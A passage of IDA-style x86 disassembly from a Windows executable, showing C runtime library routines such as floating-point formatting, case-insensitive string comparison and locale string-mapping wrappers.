mov byte ptr [eax], 30h
dec eax
loc_41EE0F: ; CODE XREF: sub_41EBD1+233�j
cmp eax, ecx
jnb short loc_41EE06
loc_41EE13: ; CODE XREF: sub_41EBD1+238�j
cmp eax, ecx
jnb short loc_41EE1B
inc eax
inc word ptr [ebx]
loc_41EE1B: ; CODE XREF: sub_41EBD1+244�j
inc byte ptr [eax]
loc_41EE1D: ; CODE XREF: sub_41EBD1+27A�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_41EE2C: ; CODE XREF: sub_41EBD1+EA�j
mov eax, [ebp+var_8]
loc_41EE2F: ; CODE XREF: sub_41EBD1+292�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41A026
leave
retn
; ---------------------------------------------------------------------------
loc_41EE3F: ; CODE XREF: sub_41EBD1+276�j
cmp byte ptr [eax], 30h
jnz short loc_41EE49
dec eax
loc_41EE45: ; CODE XREF: sub_41EBD1+231�j
cmp eax, ecx
jnb short loc_41EE3F
loc_41EE49: ; CODE XREF: sub_41EBD1+271�j
cmp eax, ecx
jnb short loc_41EE1D
mov byte ptr [ecx], 30h
loc_41EE50: ; CODE XREF: sub_41EBD1+17D�j
and word ptr [ebx], 0
and byte ptr [ebx+5], 0
xor eax, eax
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
inc eax
jmp short loc_41EE2F
sub_41EBD1 endp
; =============== S U B R O U T I N E =======================================
sub_41EE65 proc near ; CODE XREF: sub_41EE93+72�p
mov ecx, dword_42E0DC
mov eax, edx
push edi
loc_41EE6E: ; CODE XREF: sub_41EE65+19�j
cmp [eax+4], esi
jz short loc_41EE80
lea edi, [ecx+ecx*2]
add eax, 0Ch
lea edi, [edx+edi*4]
cmp eax, edi
jb short loc_41EE6E
loc_41EE80: ; CODE XREF: sub_41EE65+C�j
lea ecx, [ecx+ecx*2]
lea ecx, [edx+ecx*4]
cmp eax, ecx
pop edi
jnb short loc_41EE90
cmp [eax+4], esi
jz short locret_41EE92
loc_41EE90: ; CODE XREF: sub_41EE65+24�j
xor eax, eax
locret_41EE92: ; CODE XREF: sub_41EE65+29�j
retn
sub_41EE65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EE93 proc near ; CODE XREF: sub_41A89F+395F�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041EFDB SIZE 00000031 BYTES
push 20h
push offset stru_429D40
call __SEH_prolog
xor ecx, ecx
mov [ebp+var_1C], ecx
mov eax, [ebp+arg_0]
dec eax
dec eax
jz short loc_41EF15
dec eax
dec eax
jz short loc_41EEF5
sub eax, 4
jz short loc_41EEF5
sub eax, 3
jz short loc_41EEF5
sub eax, 4
jz short loc_41EEE8
sub eax, 6
jz short loc_41EEDB
dec eax
jz short loc_41EECE
or eax, 0FFFFFFFFh
jmp loc_41F006
; ---------------------------------------------------------------------------
loc_41EECE: ; CODE XREF: sub_41EE93+31�j
mov esi, offset dword_47C60C
mov edi, dword_47C60C
jmp short loc_41EF20
; ---------------------------------------------------------------------------
loc_41EEDB: ; CODE XREF: sub_41EE93+2E�j
mov esi, offset dword_47C608
mov edi, dword_47C608
jmp short loc_41EF20
; ---------------------------------------------------------------------------
loc_41EEE8: ; CODE XREF: sub_41EE93+29�j
mov esi, offset dword_47C610
mov edi, dword_47C610
jmp short loc_41EF20
; ---------------------------------------------------------------------------
loc_41EEF5: ; CODE XREF: sub_41EE93+1A�j
; sub_41EE93+1F�j ...
call sub_416C45
mov ebx, eax
mov [ebp+var_24], ebx
mov edx, [ebx+54h]
mov esi, [ebp+arg_0]
call sub_41EE65
mov esi, eax
add esi, 8
mov edi, [esi]
xor ecx, ecx
jmp short loc_41EF2A
; ---------------------------------------------------------------------------
loc_41EF15: ; CODE XREF: sub_41EE93+16�j
mov esi, offset dword_47C604
mov edi, dword_47C604
loc_41EF20: ; CODE XREF: sub_41EE93+46�j
; sub_41EE93+53�j ...
mov [ebp+var_1C], 1
mov ebx, [ebp+var_24]
loc_41EF2A: ; CODE XREF: sub_41EE93+80�j
mov [ebp+var_20], edi
cmp edi, 1
jz loc_41F004
cmp edi, ecx
jnz short loc_41EF41
push 3
call sub_415ED4
loc_41EF41: ; CODE XREF: sub_41EE93+A5�j
cmp [ebp+var_1C], ecx
jz short loc_41EF4F
push ecx
call sub_4180B5
pop ecx
xor ecx, ecx
loc_41EF4F: ; CODE XREF: sub_41EE93+B1�j
mov [ebp+ms_exc.disabled], ecx
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_41EF64
cmp eax, 0Bh
jz short loc_41EF64
cmp eax, 4
jnz short loc_41EF7F
loc_41EF64: ; CODE XREF: sub_41EE93+C5�j
; sub_41EE93+CA�j
mov edx, [ebx+58h]
mov [ebp+var_28], edx
mov [ebx+58h], ecx
cmp eax, 8
jnz short loc_41EFAB
mov edx, [ebx+5Ch]
mov [ebp+var_2C], edx
mov dword ptr [ebx+5Ch], 8Ch
loc_41EF7F: ; CODE XREF: sub_41EE93+CF�j
cmp eax, 8
jnz short loc_41EFAB
mov eax, dword_42E0D0
loc_41EF89: ; CODE XREF: sub_41EE93+116�j
mov [ebp+var_30], eax
mov edx, dword_42E0D4
mov esi, dword_42E0D0
add edx, esi
cmp eax, edx
jge short loc_41EFAD
lea edx, [eax+eax*2]
mov esi, [ebx+54h]
mov [esi+edx*4+8], ecx
inc eax
jmp short loc_41EF89
; ---------------------------------------------------------------------------
loc_41EFAB: ; CODE XREF: sub_41EE93+DD�j
; sub_41EE93+EF�j
mov [esi], ecx
loc_41EFAD: ; CODE XREF: sub_41EE93+109�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41EFCE
cmp [ebp+arg_0], 8
jnz short loc_41EFDB
push dword ptr [ebx+5Ch]
push 8
call edi
pop ecx
jmp short loc_41EFE0
sub_41EE93 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41EFC6 proc near ; DATA XREF: .rdata:stru_429D40�o
mov edi, [ebp-20h]
mov ebx, [ebp-24h]
xor ecx, ecx
sub_41EFC6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41EFCE proc near ; CODE XREF: sub_41EE93+11E�p
cmp [ebp-1Ch], ecx
jz short locret_41EFDA
push ecx
call sub_418021
pop ecx
locret_41EFDA: ; CODE XREF: sub_41EFCE+3�j
retn
sub_41EFCE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41EE93
loc_41EFDB: ; CODE XREF: sub_41EE93+127�j
push [ebp+arg_0]
call edi
loc_41EFE0: ; CODE XREF: sub_41EE93+131�j
pop ecx
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_41EFF3
cmp eax, 0Bh
jz short loc_41EFF3
cmp eax, 4
jnz short loc_41F004
loc_41EFF3: ; CODE XREF: sub_41EE93+154�j
; sub_41EE93+159�j
mov ecx, [ebp+var_28]
mov [ebx+58h], ecx
cmp eax, 8
jnz short loc_41F004
mov eax, [ebp+var_2C]
mov [ebx+5Ch], eax
loc_41F004: ; CODE XREF: sub_41EE93+9D�j
; sub_41EE93+15E�j ...
xor eax, eax
loc_41F006: ; CODE XREF: sub_41EE93+36�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41EE93
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+10h]
or ecx, ecx
jz short loc_41F06A
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_41F02C: ; CODE XREF: .text:0041F059�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_41F05B
or al, al
jz short loc_41F05B
add esi, 1
add edi, 1
cmp ah, bh
jb short loc_41F048
cmp ah, bl
ja short loc_41F048
add ah, dh
loc_41F048: ; CODE XREF: .text:0041F040�j
; .text:0041F044�j
cmp al, bh
jb short loc_41F052
cmp al, bl
ja short loc_41F052
add al, dh
loc_41F052: ; CODE XREF: .text:0041F04A�j
; .text:0041F04E�j
cmp ah, al
jnz short loc_41F061
sub ecx, 1
jnz short loc_41F02C
loc_41F05B: ; CODE XREF: .text:0041F032�j
; .text:0041F036�j
xor ecx, ecx
cmp ah, al
jz short loc_41F06A
loc_41F061: ; CODE XREF: .text:0041F054�j
mov ecx, 0FFFFFFFFh
jb short loc_41F06A
neg ecx
loc_41F06A: ; CODE XREF: .text:0041F01B�j
; .text:0041F05F�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_41F071 proc near ; CODE XREF: sub_41E49E+73�p
; sub_41E49E+C4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_47C640[ecx*4]
lea eax, [eax+eax*8]
lea edx, [ecx+eax*4+4]
mov cl, [edx]
xor eax, eax
mov al, cl
push esi
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_41F0A7
and cl, 7Fh
jmp short loc_41F0B4
; ---------------------------------------------------------------------------
loc_41F0A7: ; CODE XREF: sub_41F071+2F�j
cmp [esp+4+arg_4], 4000h
jnz short loc_41F0C3
or cl, 80h
loc_41F0B4: ; CODE XREF: sub_41F071+34�j
neg eax
sbb eax, eax
and eax, 0FFFFC000h
add eax, esi
mov [edx], cl
pop esi
retn
; ---------------------------------------------------------------------------
loc_41F0C3: ; CODE XREF: sub_41F071+3E�j
call sub_419430
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
pop esi
retn
sub_41F071 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F0D3 proc near ; CODE XREF: sub_41EBD1+15D�p
; sub_41F30B+6E�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
mov eax, dword_42DEB8
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+var_4], eax
xor eax, eax
xor ecx, ecx
mov cx, [ebx+0Ah]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_18], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov ax, [esi+0Ah]
push edi
mov edi, ecx
mov edx, 7FFFh
and ecx, edx
xor edi, eax
and eax, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_41F2E0
cmp cx, 7FFFh
jnb loc_41F2E0
cmp dx, 0BFFDh
ja loc_41F2E0
cmp dx, 3FBFh
ja short loc_41F149
xor eax, eax
jmp short loc_41F183
; ---------------------------------------------------------------------------
loc_41F149: ; CODE XREF: sub_41F0D3+70�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_41F16B
inc [ebp+arg_0]
xor eax, eax
test [esi+8], edx
jnz short loc_41F16D
cmp [esi+4], eax
jnz short loc_41F16D
cmp [esi], eax
jnz short loc_41F16D
jmp loc_41F2DA
; ---------------------------------------------------------------------------
loc_41F16B: ; CODE XREF: sub_41F0D3+7E�j
xor eax, eax
loc_41F16D: ; CODE XREF: sub_41F0D3+88�j
; sub_41F0D3+8D�j ...
cmp cx, ax
jnz short loc_41F190
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_41F190
cmp [ebx+4], eax
jnz short loc_41F190
cmp [ebx], eax
jnz short loc_41F190
loc_41F183: ; CODE XREF: sub_41F0D3+74�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_41F2FB
; ---------------------------------------------------------------------------
loc_41F190: ; CODE XREF: sub_41F0D3+9D�j
; sub_41F0D3+A5�j ...
mov [ebp+var_14], eax
lea eax, [ebp+var_24]
mov [ebp+var_8], eax
mov [ebp+arg_4], 5
loc_41F1A0: ; CODE XREF: sub_41F0D3+12F�j
mov eax, [ebp+var_14]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_41F1F4
add eax, esi
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [ebx+8]
mov [ebp+var_10], ecx
mov [ebp+var_1C], eax
loc_41F1BC: ; CODE XREF: sub_41F0D3+11F�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
movzx ecx, word ptr [ecx]
movzx eax, word ptr [eax]
imul eax, ecx
mov ecx, [ebp+var_8]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_41E5D9
add esp, 0Ch
test eax, eax
jz short loc_41F1E7
mov eax, [ebp+var_8]
inc word ptr [eax]
loc_41F1E7: ; CODE XREF: sub_41F0D3+10C�j
add [ebp+var_C], 2
sub [ebp+var_10], 2
dec [ebp+var_1C]
jnz short loc_41F1BC
loc_41F1F4: ; CODE XREF: sub_41F0D3+D6�j
add [ebp+var_8], 2
inc [ebp+var_14]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_41F1A0
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_41F237
loc_41F212: ; CODE XREF: sub_41F0D3+15B�j
test byte ptr [ebp+var_20+3], 80h
jnz short loc_41F230
lea eax, [ebp+var_28]
push eax
call sub_41E658
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
pop ecx
jg short loc_41F212
loc_41F230: ; CODE XREF: sub_41F0D3+143�j
cmp word ptr [ebp+arg_0], 0
jg short loc_41F270
loc_41F237: ; CODE XREF: sub_41F0D3+13D�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_41F270
mov eax, [ebp+arg_0]
neg eax
movzx ebx, ax
add [ebp+arg_0], ebx
loc_41F250: ; CODE XREF: sub_41F0D3+191�j
test byte ptr [ebp+var_28], 1
jz short loc_41F259
inc [ebp+var_18]
loc_41F259: ; CODE XREF: sub_41F0D3+181�j
lea eax, [ebp+var_28]
push eax
call sub_41E686
dec ebx
pop ecx
jnz short loc_41F250
cmp [ebp+var_18], 0
jz short loc_41F270
or byte ptr [ebp+var_28], 1
loc_41F270: ; CODE XREF: sub_41F0D3+162�j
; sub_41F0D3+170�j ...
cmp word ptr [ebp+var_28], 8000h
ja short loc_41F287
mov eax, [ebp+var_28]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_41F2BC
loc_41F287: ; CODE XREF: sub_41F0D3+1A3�j
cmp [ebp+var_28+2], 0FFFFFFFFh
jnz short loc_41F2B9
and [ebp+var_28+2], 0
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_41F2B4
and [ebp+var_24+2], 0
cmp word ptr [ebp+var_20+2], 0FFFFh
jnz short loc_41F2AE
inc [ebp+arg_0]
mov word ptr [ebp+var_20+2], 8000h
jmp short loc_41F2BC
; ---------------------------------------------------------------------------
loc_41F2AE: ; CODE XREF: sub_41F0D3+1CE�j
inc word ptr [ebp+var_20+2]
jmp short loc_41F2BC
; ---------------------------------------------------------------------------
loc_41F2B4: ; CODE XREF: sub_41F0D3+1C2�j
inc [ebp+var_24+2]
jmp short loc_41F2BC
; ---------------------------------------------------------------------------
loc_41F2B9: ; CODE XREF: sub_41F0D3+1B8�j
inc [ebp+var_28+2]
loc_41F2BC: ; CODE XREF: sub_41F0D3+1B2�j
; sub_41F0D3+1D9�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_41F2E0
mov cx, word ptr [ebp+var_28+2]
mov [esi], cx
mov ecx, [ebp+var_24]
mov [esi+2], ecx
mov ecx, [ebp+var_20]
mov [esi+6], ecx
or eax, edi
loc_41F2DA: ; CODE XREF: sub_41F0D3+93�j
mov [esi+0Ah], ax
jmp short loc_41F2FB
; ---------------------------------------------------------------------------
loc_41F2E0: ; CODE XREF: sub_41F0D3+4F�j
; sub_41F0D3+5A�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_41F2FB: ; CODE XREF: sub_41F0D3+B8�j
; sub_41F0D3+20B�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41A026
leave
retn
sub_41F0D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F30B proc near ; CODE XREF: sub_41E797+39F�p
; sub_41EBD1+144�p
var_10 = byte ptr -10h
var_E = dword ptr -0Eh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_42DEB8
xor eax, [ebp+4]
push ebx
mov ebx, offset dword_42E370
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
mov [ebp+var_4], eax
jz short loc_41F389
jge short loc_41F339
neg [ebp+arg_4]
mov ebx, offset dword_42E4D0
sub ebx, 60h
loc_41F339: ; CODE XREF: sub_41F30B+21�j
cmp [ebp+arg_8], ecx
jnz short loc_41F344
mov eax, [ebp+arg_0]
mov [eax], cx
loc_41F344: ; CODE XREF: sub_41F30B+31�j
cmp [ebp+arg_4], ecx
jz short loc_41F389
push esi
push edi
loc_41F34B: ; CODE XREF: sub_41F30B+7A�j
mov eax, [ebp+arg_4]
sar [ebp+arg_4], 3
and eax, 7
add ebx, 54h
cmp eax, ecx
jz short loc_41F382
lea eax, [eax+eax*2]
lea esi, [ebx+eax*4]
cmp word ptr [esi], 8000h
jb short loc_41F375
lea edi, [ebp+var_10]
movsd
movsd
movsd
dec [ebp+var_E]
lea esi, [ebp+var_10]
loc_41F375: ; CODE XREF: sub_41F30B+5C�j
push esi
push [ebp+arg_0]
call sub_41F0D3
pop ecx
pop ecx
xor ecx, ecx
loc_41F382: ; CODE XREF: sub_41F30B+4F�j
cmp [ebp+arg_4], ecx
jnz short loc_41F34B
pop edi
pop esi
loc_41F389: ; CODE XREF: sub_41F30B+1F�j
; sub_41F30B+3C�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop ebx
call sub_41A026
leave
retn
sub_41F30B endp
; =============== S U B R O U T I N E =======================================
sub_41F397 proc near ; CODE XREF: sub_406650+31�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_41F3BE
push esi
call sub_4177F0
inc eax
push eax
call sub_414CAD
test eax, eax
pop ecx
pop ecx
jz short loc_41F3BE
push esi
push eax
call sub_419A70
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41F3BE: ; CODE XREF: sub_41F397+7�j
; sub_41F397+1A�j
xor eax, eax
pop esi
retn
sub_41F397 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41F3D0 proc near ; CODE XREF: sub_403BFF+14A�p
jmp ds:dword_4201F0
sub_41F3D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41F3D6 proc near ; CODE XREF: sub_415473+24�p
; sub_4157A0+13�p
jmp ds:dword_420160
sub_41F3D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F3DC proc near ; CODE XREF: sub_403338+DA�p
; sub_403338+F1�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
call sub_416C45
mov ecx, [eax+64h]
cmp ecx, off_42D84C
mov [ebp+var_4], ecx
jz short loc_41F3FD
call sub_417A7E
mov [ebp+var_4], eax
mov ecx, eax
loc_41F3FD: ; CODE XREF: sub_41F3DC+15�j
cmp dword ptr [ecx+14h], 0
push ebx
jnz short loc_41F442
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
loc_41F40A: ; CODE XREF: sub_41F3DC+62�j
xor ebx, ebx
mov bx, [ecx]
cmp bx, 41h
jb short loc_41F41E
cmp bx, 5Ah
ja short loc_41F41E
add ebx, 20h
loc_41F41E: ; CODE XREF: sub_41F3DC+37�j
; sub_41F3DC+3D�j
xor eax, eax
mov ax, [edx]
cmp ax, 41h
jb short loc_41F432
cmp ax, 5Ah
ja short loc_41F432
add eax, 20h
loc_41F432: ; CODE XREF: sub_41F3DC+4B�j
; sub_41F3DC+51�j
inc ecx
inc ecx
inc edx
inc edx
test bx, bx
jz short loc_41F47E
cmp bx, ax
jz short loc_41F40A
jmp short loc_41F47E
; ---------------------------------------------------------------------------
loc_41F442: ; CODE XREF: sub_41F3DC+26�j
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
jmp short loc_41F44F
; ---------------------------------------------------------------------------
loc_41F44C: ; CODE XREF: sub_41F3DC+9E�j
mov ecx, [ebp+var_4]
loc_41F44F: ; CODE XREF: sub_41F3DC+6E�j
xor eax, eax
mov ax, [esi]
push eax
push ecx
call sub_41F489
inc esi
inc esi
mov ebx, eax
xor eax, eax
mov ax, [edi]
push eax
push [ebp+var_4]
call sub_41F489
add esp, 10h
inc edi
inc edi
test bx, bx
jz short loc_41F47C
cmp bx, ax
jz short loc_41F44C
loc_41F47C: ; CODE XREF: sub_41F3DC+99�j
pop edi
pop esi
loc_41F47E: ; CODE XREF: sub_41F3DC+5D�j
; sub_41F3DC+64�j
movzx ecx, ax
movzx eax, bx
sub eax, ecx
pop ebx
leave
retn
sub_41F3DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F489 proc near ; CODE XREF: sub_41F3DC+7A�p
; sub_41F3DC+8C�p
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, 0FFFFh
cmp word ptr [ebp+arg_4], ax
jz short locret_41F4E8
cmp word ptr [ebp+arg_4], 100h
push esi
mov esi, [ebp+arg_0]
jnb short loc_41F4BC
push 1
push [ebp+arg_4]
push esi
call sub_41F743
add esp, 0Ch
test eax, eax
jnz short loc_41F4BC
mov ax, word ptr [ebp+arg_4]
jmp short loc_41F4E7
; ---------------------------------------------------------------------------
loc_41F4BC: ; CODE XREF: sub_41F489+19�j
; sub_41F489+2B�j
push dword ptr [esi+4]
lea eax, [ebp+var_4]
push 1
push eax
push 1
lea eax, [ebp+arg_4]
push eax
push 100h
push dword ptr [esi+14h]
call sub_41F4EA
add esp, 1Ch
test eax, eax
mov ax, word ptr [ebp+arg_4]
jz short loc_41F4E7
mov ax, [ebp+var_4]
loc_41F4E7: ; CODE XREF: sub_41F489+31�j
; sub_41F489+58�j
pop esi
locret_41F4E8: ; CODE XREF: sub_41F489+D�j
leave
retn
sub_41F489 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F4EA proc near ; CODE XREF: sub_41F489+4A�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push 24h
push offset stru_429D50
call __SEH_prolog
xor ebx, ebx
xor edi, edi
inc edi
cmp dword_47C624, ebx
jnz short loc_41F538
push ebx
push ebx
push edi
push offset dword_429080
push 100h
push ebx
call ds:dword_4201A4 ; LCMapStringW
test eax, eax
jz short loc_41F523
mov dword_47C624, edi
jmp short loc_41F538
; ---------------------------------------------------------------------------
loc_41F523: ; CODE XREF: sub_41F4EA+2F�j
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41F538
mov dword_47C624, 2
loc_41F538: ; CODE XREF: sub_41F4EA+17�j
; sub_41F4EA+37�j ...
cmp [ebp+arg_C], ebx
jle short loc_41F55A
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_41F543: ; CODE XREF: sub_41F4EA+63�j
dec ecx
cmp [eax], bx
jz short loc_41F552
inc eax
inc eax
cmp ecx, ebx
jnz short loc_41F543
or ecx, 0FFFFFFFFh
loc_41F552: ; CODE XREF: sub_41F4EA+5D�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+arg_C], eax
loc_41F55A: ; CODE XREF: sub_41F4EA+51�j
mov eax, dword_47C624
cmp eax, edi
jnz short loc_41F580
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A4 ; LCMapStringW
jmp loc_41F73A
; ---------------------------------------------------------------------------
loc_41F580: ; CODE XREF: sub_41F4EA+77�j
cmp eax, 2
jz short loc_41F589
cmp eax, ebx
jnz short loc_41F5DD
loc_41F589: ; CODE XREF: sub_41F4EA+99�j
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_24], ebx
cmp [ebp+arg_0], ebx
jnz short loc_41F59F
mov eax, dword_47C4E0
mov [ebp+arg_0], eax
loc_41F59F: ; CODE XREF: sub_41F4EA+AB�j
cmp [ebp+arg_18], ebx
jnz short loc_41F5AC
mov eax, dword_47C4F0
mov [ebp+arg_18], eax
loc_41F5AC: ; CODE XREF: sub_41F4EA+B8�j
push [ebp+arg_0]
call sub_41DD87
pop ecx
cmp [ebp+arg_18], eax
jz short loc_41F5C2
cmp eax, 0FFFFFFFFh
jz short loc_41F5C2
mov [ebp+arg_18], eax
loc_41F5C2: ; CODE XREF: sub_41F4EA+CE�j
; sub_41F4EA+D3�j
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push [ebp+arg_18]
call ds:dword_4200D8 ; WideCharToMultiByte
mov [ebp+var_28], eax
cmp eax, ebx
jnz short loc_41F5E4
loc_41F5DD: ; CODE XREF: sub_41F4EA+9D�j
; sub_41F4EA+141�j
xor eax, eax
jmp loc_41F73A
; ---------------------------------------------------------------------------
loc_41F5E4: ; CODE XREF: sub_41F4EA+F1�j
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_414630
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41F618
; ---------------------------------------------------------------------------
loc_41F600: ; DATA XREF: .rdata:stru_429D50�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41F604: ; DATA XREF: .rdata:stru_429D50�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419B68
xor ebx, ebx
mov [ebp+var_2C], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor edi, edi
inc edi
loc_41F618: ; CODE XREF: sub_41F4EA+114�j
cmp [ebp+var_2C], ebx
jnz short loc_41F630
push [ebp+var_28]
call sub_414CAD
pop ecx
mov [ebp+var_2C], eax
cmp eax, ebx
jz short loc_41F5DD
mov [ebp+var_20], edi
loc_41F630: ; CODE XREF: sub_41F4EA+131�j
push ebx
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push [ebp+arg_18]
call ds:dword_4200D8 ; WideCharToMultiByte
test eax, eax
jz loc_41F71A
push ebx
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A0 ; LCMapStringA
mov esi, eax
mov [ebp+var_30], esi
cmp esi, ebx
jz loc_41F71A
mov [ebp+ms_exc.disabled], edi
add eax, 3
and eax, 0FFFFFFFCh
call sub_414630
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_34], edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41F6A4
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_419B68
xor ebx, ebx
xor edi, edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_30]
loc_41F6A4: ; CODE XREF: sub_41F4EA+1A1�j
cmp edi, ebx
jnz short loc_41F6BC
push esi
call sub_414CAD
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_41F71D
mov [ebp+var_24], 1
loc_41F6BC: ; CODE XREF: sub_41F4EA+1BC�j
push esi
push edi
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A0 ; LCMapStringA
test eax, eax
jz short loc_41F71D
test byte ptr [ebp+arg_4+1], 4
jz short loc_41F6F9
mov [ebp+var_1C], esi
cmp [ebp+arg_14], ebx
jz short loc_41F71D
cmp [ebp+arg_14], esi
jge short loc_41F6EA
mov esi, [ebp+arg_14]
loc_41F6EA: ; CODE XREF: sub_41F4EA+1FB�j
push esi
push edi
push [ebp+arg_10]
call sub_4144A0
add esp, 0Ch
jmp short loc_41F71D
; ---------------------------------------------------------------------------
loc_41F6F9: ; CODE XREF: sub_41F4EA+1EE�j
cmp [ebp+arg_14], ebx
jnz short loc_41F702
push ebx
push ebx
jmp short loc_41F708
